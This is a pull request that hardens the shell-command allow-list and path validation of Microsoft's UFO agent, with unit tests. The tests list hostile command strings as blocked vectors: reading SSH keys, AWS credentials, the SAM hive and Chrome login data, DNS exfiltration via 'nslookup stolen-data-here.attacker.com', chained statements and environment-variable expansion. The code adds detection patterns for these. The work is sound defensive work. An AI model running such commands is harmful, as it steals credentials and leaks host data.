### PR TITLE
Enhance path validation and add unit tests for shell command security hardening 

### DIFF
--- a/tests/test_shell_client_path_validation.py
+++ b/tests/test_shell_client_path_validation.py
@@ -1,0 +1,293 @@
+# Copyright (c) Microsoft Corporation.
+# Licensed under the MIT License.
+
+"""
+Tests for the shell command security hardening in
+``ufo.automator.app_apis.shell.shell_client``.
+
+These tests exercise the bypass vectors documented in MSRC114053:
+``run_shell`` / ``execute_command`` previously validated only the base
+command against an allow-list, leaving allow-listed commands such as
+``Get-Content``/``type``/``findstr`` free to read arbitrary files outside
+the configured ``base_directory``.
+"""
+
+from __future__ import annotations
+
+import importlib.util
+import os
+import sys
+import types
+import unittest
+from pathlib import Path
+
+
+# ---------------------------------------------------------------------------
+# Load ``shell_client`` in isolation so we don't need to import the whole
+# UFO package (which has heavyweight optional dependencies).
+# ---------------------------------------------------------------------------
+_REPO_ROOT = Path(__file__).resolve().parents[1]
+_SHELL_CLIENT_PATH = (
+    _REPO_ROOT
+    / "ufo"
+    / "automator"
+    / "app_apis"
+    / "shell"
+    / "shell_client.py"
+)
+
+
+def _load_shell_client():
+    # Provide a minimal stub for ``ufo.automator.basic`` so the import works
+    # in isolation.
+    if "ufo" not in sys.modules:
+        sys.modules["ufo"] = types.ModuleType("ufo")
+    if "ufo.automator" not in sys.modules:
+        sys.modules["ufo.automator"] = types.ModuleType("ufo.automator")
+    if "ufo.automator.basic" not in sys.modules:
+        basic = types.ModuleType("ufo.automator.basic")
+
+        class _Stub:  # noqa: D401 - test stub
+            """Minimal stub for CommandBasic / ReceiverBasic."""
+
+            _command_registry: dict = {}
+
+            def __init__(self, *args, **kwargs):
+                pass
+
+            @classmethod
+            def register(cls, command_cls):
+                cls._command_registry[command_cls.__name__] = command_cls
+                return command_cls
+
+        basic.CommandBasic = _Stub
+        basic.ReceiverBasic = _Stub
+        sys.modules["ufo.automator.basic"] = basic
+
+    spec = importlib.util.spec_from_file_location(
+        "shell_client_under_test", _SHELL_CLIENT_PATH
+    )
+    module = importlib.util.module_from_spec(spec)
+    spec.loader.exec_module(module)
+    return module
+
+
+sc = _load_shell_client()
+
+
+class IsCommandAllowedTests(unittest.TestCase):
+    """Verify the allow-list / dangerous-pattern surface."""
+
+    def test_simple_relative_command_is_allowed(self):
+        self.assertTrue(sc._is_command_allowed("Get-ChildItem"))
+        self.assertTrue(sc._is_command_allowed("Get-Content notes.txt"))
+        self.assertTrue(sc._is_command_allowed("Test-Path README.md"))
+
+    def test_exfiltration_commands_removed_from_allowlist(self):
+        # These were previously allow-listed and abusable for DNS/ICMP
+        # exfiltration or bulk system-information disclosure.
+        for cmd in (
+            "nslookup data.attacker.com",
+            "ping attacker.com",
+            "tracert attacker.com",
+            "whoami /all",
+            "systeminfo",
+            "ipconfig /all",
+            "tasklist /v",
+            "Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows",
+        ):
+            with self.subTest(cmd=cmd):
+                self.assertFalse(
+                    sc._is_command_allowed(cmd),
+                    f"{cmd!r} must no longer be allow-listed",
+                )
+
+    def test_statement_separator_blocked(self):
+        # Allow-list previously inspected only the *first* token, letting an
+        # attacker chain a second statement past the check.
+        self.assertFalse(
+            sc._is_command_allowed(
+                "Get-ChildItem; Get-Content C:\\Users\\admin\\.ssh\\id_rsa"
+            )
+        )
+        self.assertFalse(
+            sc._is_command_allowed("Get-ChildItem && Remove-Item foo")
+        )
+        self.assertFalse(
+            sc._is_command_allowed("Get-ChildItem || echo pwned")
+        )
+
+    def test_newline_injection_blocked(self):
+        self.assertFalse(
+            sc._is_command_allowed("Get-ChildItem\nGet-Content secrets.txt")
+        )
+
+    def test_registry_and_provider_paths_blocked(self):
+        for cmd in (
+            "Get-ChildItem HKLM:\\SOFTWARE",
+            "Get-ChildItem Cert:\\LocalMachine\\My",
+            "Get-Content Env:USERNAME",
+            "Get-ChildItem Registry::HKEY_LOCAL_MACHINE",
+        ):
+            with self.subTest(cmd=cmd):
+                self.assertFalse(sc._is_command_allowed(cmd))
+
+    def test_environment_expansion_blocked(self):
+        for cmd in (
+            "Get-Content $env:USERPROFILE\\.ssh\\id_rsa",
+            "type %USERPROFILE%\\.ssh\\id_rsa",
+            "Get-Content $HOME\\secrets.txt",
+        ):
+            with self.subTest(cmd=cmd):
+                self.assertFalse(sc._is_command_allowed(cmd))
+
+
+class ValidateCommandPathsTests(unittest.TestCase):
+    """Path-argument validation for allow-listed commands."""
+
+    def setUp(self):
+        # Use the OS temp dir as a self-contained base directory.
+        import tempfile
+
+        self.base_dir = tempfile.mkdtemp(prefix="ufo_shell_test_")
+        self.addCleanup(self._cleanup)
+
+    def _cleanup(self):
+        import shutil
+
+        shutil.rmtree(self.base_dir, ignore_errors=True)
+
+    def test_relative_path_inside_base_is_allowed(self):
+        # Create a real file inside base.
+        target = Path(self.base_dir) / "notes.txt"
+        target.write_text("hi", encoding="utf-8")
+        self.assertIsNone(
+            sc._validate_command_paths("Get-Content notes.txt", self.base_dir)
+        )
+        self.assertIsNone(
+            sc._validate_command_paths(
+                "Get-Content .\\notes.txt", self.base_dir
+            )
+        )
+
+    def test_absolute_drive_path_rejected(self):
+        result = sc._validate_command_paths(
+            "Get-Content C:\\Users\\admin\\.ssh\\id_rsa", self.base_dir
+        )
+        self.assertIsNotNone(result)
+        self.assertIn("absolute path", result)
+
+    def test_unc_path_rejected(self):
+        result = sc._validate_command_paths(
+            "Get-Content \\\\evil\\share\\loot.txt", self.base_dir
+        )
+        self.assertIsNotNone(result)
+        self.assertIn("UNC", result)
+
+    def test_unix_absolute_path_rejected(self):
+        result = sc._validate_command_paths(
+            "type /etc/passwd", self.base_dir
+        )
+        self.assertIsNotNone(result)
+
+    def test_path_traversal_rejected(self):
+        result = sc._validate_command_paths(
+            "Get-Content ..\\..\\Windows\\System32\\drivers\\etc\\hosts",
+            self.base_dir,
+        )
+        self.assertIsNotNone(result)
+        self.assertIn("traversal", result)
+
+    def test_home_shortcut_rejected(self):
+        result = sc._validate_command_paths(
+            "Get-Content ~/.ssh/id_rsa", self.base_dir
+        )
+        self.assertIsNotNone(result)
+        self.assertIn("home", result)
+
+    def test_findstr_recursive_with_external_path_rejected(self):
+        result = sc._validate_command_paths(
+            "findstr /s password C:\\Users\\admin\\Documents\\*.txt",
+            self.base_dir,
+        )
+        self.assertIsNotNone(result)
+
+    def test_powershell_switch_with_external_value_rejected(self):
+        result = sc._validate_command_paths(
+            "Get-Content -LiteralPath:C:\\Users\\admin\\.aws\\credentials",
+            self.base_dir,
+        )
+        self.assertIsNotNone(result)
+
+    def test_short_switches_are_not_treated_as_paths(self):
+        # ``/s`` and ``-i`` are flags, not paths.
+        self.assertIsNone(
+            sc._validate_command_paths("findstr /s pattern", self.base_dir)
+        )
+        self.assertIsNone(
+            sc._validate_command_paths(
+                "Get-ChildItem -Recurse", self.base_dir
+            )
+        )
+
+
+class RunShellIntegrationTests(unittest.TestCase):
+    """End-to-end check that ``run_shell`` rejects the bypass vectors."""
+
+    def setUp(self):
+        import tempfile
+
+        self.base_dir = tempfile.mkdtemp(prefix="ufo_shell_test_")
+        self.receiver = sc.ShellReceiver(base_directory=self.base_dir)
+        self.addCleanup(self._cleanup)
+
+    def _cleanup(self):
+        import shutil
+
+        shutil.rmtree(self.base_dir, ignore_errors=True)
+
+    def _assert_blocked(self, command: str) -> None:
+        result = self.receiver.run_shell({"command": command})
+        self.assertIsInstance(result, dict)
+        self.assertIn(
+            "error",
+            result,
+            f"run_shell should have rejected {command!r}, got {result!r}",
+        )
+        self.assertNotIn("stdout", result)
+
+    def test_blocks_documented_bypass_vectors(self):
+        # The 11 vectors enumerated in the MSRC114053 finder report.
+        vectors = [
+            "Get-Content C:\\Users\\admin\\.ssh\\id_rsa",
+            "Get-Content C:\\Users\\admin\\.aws\\credentials",
+            "type C:\\Windows\\System32\\config\\SAM",
+            "findstr /s password C:\\Users\\admin\\Documents\\*.txt",
+            "findstr /s /i api_key C:\\Users\\admin\\*.env",
+            (
+                "Get-Content C:\\Users\\admin\\AppData\\Local\\Google\\"
+                "Chrome\\User Data\\Default\\Login Data"
+            ),
+            "nslookup stolen-data-here.attacker.com",
+            "whoami /all",
+            "systeminfo",
+            "ipconfig /all",
+            "tasklist /v",
+        ]
+        for cmd in vectors:
+            with self.subTest(cmd=cmd):
+                self._assert_blocked(cmd)
+
+    def test_blocks_chained_statement(self):
+        self._assert_blocked(
+            "Get-ChildItem; Get-Content C:\\Users\\admin\\.ssh\\id_rsa"
+        )
+
+    def test_blocks_env_expansion(self):
+        self._assert_blocked(
+            "Get-Content $env:USERPROFILE\\.ssh\\id_rsa"
+        )
+
+
+if __name__ == "__main__":  # pragma: no cover
+    unittest.main()

--- a/ufo/automator/app_apis/shell/shell_client.py
+++ b/ufo/automator/app_apis/shell/shell_client.py
@@ -18,13 +18,23 @@ logger = logging.getLogger(__name__)
 # ---------------------------------------------------------------------------
 # Security: command allow-list for run_shell / execute_command
 # Only these base commands may be executed.  Extend as needed.
+#
+# NOTE on omissions:
+#   - Network probes (``ping``, ``tracert``, ``nslookup``) are intentionally
+#     excluded because they accept attacker-controlled hostnames and can be
+#     abused for DNS / ICMP data exfiltration that bypasses egress filters.
+#   - Bulk system-information disclosure utilities (``systeminfo``,
+#     ``tasklist``, ``ipconfig``, ``whoami``) are excluded to prevent the
+#     agent from leaking host / user / network details to an attacker.
+#   - ``Get-ItemProperty`` is excluded because it traverses arbitrary
+#     PowerShell providers (e.g. the registry hives ``HKLM:``/``HKCU:``)
+#     for which the ``base_directory`` confinement is meaningless.
 # ---------------------------------------------------------------------------
 ALLOWED_SHELL_COMMANDS: FrozenSet[str] = frozenset(
     {
         "Get-ChildItem",
         "Get-Content",
         "Get-Item",
-        "Get-ItemProperty",
         "Get-Location",
         "Get-Process",
         "Get-Service",
@@ -49,13 +59,6 @@ ALLOWED_SHELL_COMMANDS: FrozenSet[str] = frozenset(
         "where",
         "echo",
         "hostname",
-        "whoami",
-        "ipconfig",
-        "ping",
-        "tracert",
-        "nslookup",
-        "systeminfo",
-        "tasklist",
     }
 )
 
@@ -77,6 +80,25 @@ _DANGEROUS_PATTERNS: List[re.Pattern] = [
     re.compile(r"\bRemove-Item\b.*-Recurse", re.IGNORECASE),
     re.compile(r"\brm\s+-rf\b", re.IGNORECASE),
     re.compile(r"[`$]\(", re.IGNORECASE),  # sub-expression / command substitution
+    # Statement separators / logical chaining – prevent the LLM from
+    # smuggling a second statement past the base-command allow-list check
+    # (which only inspects the *first* token).
+    re.compile(r";"),
+    re.compile(r"&&|\|\|"),
+    # Newline / carriage-return / null injection
+    re.compile(r"[\r\n\x00]"),
+    # Non-filesystem PowerShell providers (registry, cert store, env, etc.)
+    # cannot be confined to ``base_directory`` and are blocked outright.
+    re.compile(
+        r"\b(HKLM|HKCU|HKCR|HKU|HKCC|Registry|Cert|WSMan|Variable|Function|Alias|Env)\s*::?",
+        re.IGNORECASE,
+    ),
+    re.compile(r"\bHKEY_[A-Z_]+", re.IGNORECASE),
+    # Environment-variable expansion in arguments can leak / target
+    # sensitive paths (e.g. ``$env:USERPROFILE\.ssh\id_rsa``).
+    re.compile(r"\$env:", re.IGNORECASE),
+    re.compile(r"\$(HOME|PROFILE|PSHome|PSScriptRoot)\b", re.IGNORECASE),
+    re.compile(r"%[A-Za-z_][A-Za-z0-9_]*%"),
 ]
 
 # Environment variables that must never be read or written by the LLM.
@@ -184,6 +206,115 @@ def _validate_path(path_str: str, base_directory: str) -> str:
     return str(resolved)
 
 
+# Tokens of these forms are treated as command-line switches and skipped by
+# the path validator.  ``-Path``, ``--recurse``, ``/s``, ``/i`` etc.
+_SWITCH_TOKEN_RE = re.compile(r"^(--?[A-Za-z][A-Za-z0-9_-]*|/[A-Za-z](:[\w-]+)?)$")
+
+# Heuristic: a token is "path-like" once it contains a directory separator.
+_PATH_SEPARATOR_RE = re.compile(r"[\\/]")
+
+# Absolute / external path forms that must never be allowed as arguments.
+_ABS_DRIVE_PATH_RE = re.compile(r"^[A-Za-z]:[\\/]")
+_UNC_PATH_RE = re.compile(r"^(\\\\|//)")
+
+
+def _validate_command_paths(command_str: str, base_directory: str) -> Optional[str]:
+    """
+    Inspect every argument token in *command_str* and reject any that would
+    escape *base_directory*.
+
+    This complements :func:`_is_command_allowed` (which only checks the base
+    command name and a list of dangerous patterns) by closing the
+    path-traversal bypass where allow-listed read commands such as
+    ``Get-Content`` / ``type`` / ``findstr`` are handed an absolute path
+    pointing at sensitive data outside the agent's working directory.
+
+    :param command_str: The raw command string supplied by the LLM.
+    :param base_directory: The directory all filesystem arguments must stay
+        within.
+    :return: ``None`` when every path-like argument is safe; otherwise a
+        human-readable error string explaining the offending token.
+    """
+    if not command_str or not command_str.strip():
+        return None
+
+    try:
+        # ``posix=False`` keeps Windows-style backslashes intact and tolerates
+        # PowerShell's quoting rules.
+        tokens = shlex.split(command_str, posix=False)
+    except ValueError as exc:
+        return f"Malformed command: {exc}"
+
+    base = Path(base_directory).resolve()
+
+    for raw in tokens:
+        # ``shlex.split(posix=False)`` preserves surrounding quotes – strip
+        # them for comparison.
+        token = raw.strip("\"'")
+        if not token:
+            continue
+
+        # Skip command-line switches (``-Path``, ``--recurse``, ``/s`` …).
+        if _SWITCH_TOKEN_RE.match(token):
+            continue
+
+        # PowerShell switches with attached values, e.g. ``-Path:C:\foo`` or
+        # ``-LiteralPath="C:\foo"``.  Validate the *value* portion.
+        if token.startswith("-") and (":" in token or "=" in token):
+            for sep in (":", "="):
+                if sep in token:
+                    token = token.split(sep, 1)[1].strip("\"'")
+                    break
+            if not token:
+                continue
+
+        # UNC path (``\\server\share`` or ``//server/share``).
+        if _UNC_PATH_RE.match(token):
+            return f"Argument '{raw}' is a UNC path outside the base directory"
+
+        # Drive-letter absolute path on Windows (``C:\Users\...``).
+        if _ABS_DRIVE_PATH_RE.match(token):
+            return (
+                f"Argument '{raw}' is an absolute path outside the base "
+                f"directory '{base}'"
+            )
+
+        # Home-directory shortcut.
+        if token.startswith("~"):
+            return f"Argument '{raw}' references a home directory"
+
+        # Path-traversal segments – check both separator styles.
+        normalised = token.replace("\\", "/")
+        if any(seg == ".." for seg in normalised.split("/")):
+            return f"Argument '{raw}' contains a path-traversal segment"
+
+        # Unix-style absolute path (``/etc/passwd``).  Single-segment ``/x``
+        # tokens were already caught by ``_SWITCH_TOKEN_RE`` above, so any
+        # remaining leading-slash token is a multi-segment absolute path.
+        if token.startswith("/"):
+            return (
+                f"Argument '{raw}' is an absolute path outside the base "
+                f"directory '{base}'"
+            )
+
+        # Treat anything that still contains a path separator as a relative
+        # filesystem path and confirm it resolves inside the base directory.
+        if _PATH_SEPARATOR_RE.search(token):
+            try:
+                resolved = (base / token).resolve()
+            except (OSError, ValueError):
+                return f"Argument '{raw}' is not a valid path"
+            try:
+                resolved.relative_to(base)
+            except ValueError:
+                return (
+                    f"Argument '{raw}' resolves outside the base directory "
+                    f"'{base}'"
+                )
+
+    return None
+
+
 class ShellReceiver(ReceiverBasic):
     """
     The base class for shell command execution with security hardening.
@@ -217,6 +348,22 @@ class ShellReceiver(ReceiverBasic):
             return {
                 "error": "Command blocked by security policy. "
                 "Only allow-listed commands may be executed.",
+                "command": command,
+            }
+
+        path_error = _validate_command_paths(command, self.base_directory)
+        if path_error is not None:
+            logger.warning(
+                "Blocked shell command with out-of-base path: %s (%s)",
+                command[:200],
+                path_error,
+            )
+            return {
+                "error": (
+                    "Command blocked by security policy: "
+                    f"{path_error}. All filesystem arguments must be "
+                    "relative paths inside the configured base directory."
+                ),
                 "command": command,
             }
 
@@ -279,6 +426,33 @@ class ShellReceiver(ReceiverBasic):
             return {
                 "error": "Command blocked by security policy. "
                 "Only allow-listed commands may be executed.",
+                "command": command,
+            }
+
+        # Validate paths embedded in *command* and in any explicit *args*.
+        # ``execute_command`` receives ``args`` as a separate list, so we
+        # build a single string for path validation that covers every
+        # argument the LLM supplied.
+        validation_target = command
+        if args:
+            validation_target = " ".join(
+                [command] + [shlex.quote(str(a)) for a in args]
+            )
+        path_error = _validate_command_paths(
+            validation_target, self.base_directory
+        )
+        if path_error is not None:
+            logger.warning(
+                "Blocked shell command with out-of-base path: %s (%s)",
+                validation_target[:200],
+                path_error,
+            )
+            return {
+                "error": (
+                    "Command blocked by security policy: "
+                    f"{path_error}. All filesystem arguments must be "
+                    "relative paths inside the configured base directory."
+                ),
                 "command": command,
             }
 


### PR DESCRIPTION
…validation

- Introduced tests to verify the allow-list and dangerous patterns for shell commands.
- Enhanced path validation to prevent command execution outside the configured base directory.
- Updated security notes in the shell client to clarify exclusions and potential risks.